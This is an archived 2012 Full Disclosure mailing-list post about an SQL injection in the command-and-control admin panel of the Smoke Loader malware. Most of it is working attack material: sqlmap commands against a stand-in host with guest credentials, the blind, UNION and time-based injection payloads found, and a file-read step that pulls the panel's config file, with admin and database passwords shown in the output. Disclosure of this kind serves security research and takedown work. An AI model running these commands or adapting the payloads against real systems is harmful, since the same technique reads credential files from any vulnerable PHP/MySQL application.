Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

smoke loader

From: Ian <tohitsugu () gmail com>
Date: Thu, 20 Dec 2012 20:34:16 -0800
Like other http-based exploit kits, I've discovered that the smoke loader malware downloader has a sql injection in its 
C&C administration panel that can be used to revel the administrator's password.

sqlmap can identify the vulnerable parameter with the string:

root@localhoost:/opt/pentest/database/sqlmap#  ./sqlmap.py -u evilserver.com/directory/guest.php
--auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3
--risk 3


sqlmap identified the following injection points with a total of 278
HTTP(s) requests:
---
Place: GET
Parameter: id
     Type: boolean-based blind
     Title: MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)
     Payload: id=1 LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
RLIKE IF(2984=2984,0x4d7953514c,0x28)

     Type: UNION query
     Title: MySQL UNION query (NULL) - 13 columns
     Payload: id=1 LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a71616c3a,0x467173496b71686b617a,0x3a7269703a),NULL,NULL,NULL,NULL,NULL#

     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: id=1 LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
AND SLEEP(5)

Then:

root@localhoost:/opt/pentest/database/sqlmap#  ./sqlmap.py -u evilserver.com/directory/guest.php
--auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3 --risk
3 --file-read=[smoke root directory--can be found by sql errors on guest panel
by replacing the above parameters with invalid data]/admin/inc/cfg.php


root@localhoost:/opt/pentest/database/sqlmap#  cat output/localhost/files/_var_www_smoke_admin_inc_cfg.php
<?php

$config["admin"] = "bla";                //admin login name
$config["pass"] = "blabla";                //admin password

$config["guest"] = "guest";                //admin login name
$config["gpass"] = "guest";                //admin password

$config["dbhost"] = "localhost";
$config["dbname"] = "smoke";                //mysql database name
$config["dbuser"] = "bla";                //mysql database username
$config["dbpass"] = "meh";            //mysql databse password

$config["interval"] = 600;                //interval for check online bots

$OS = array
(
     0 => "Windows XP",
     1 => "Windows 2003",
     2 => "Windows Vista",
     3 => "Windows 7",
     4 => "Other"
);

?>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: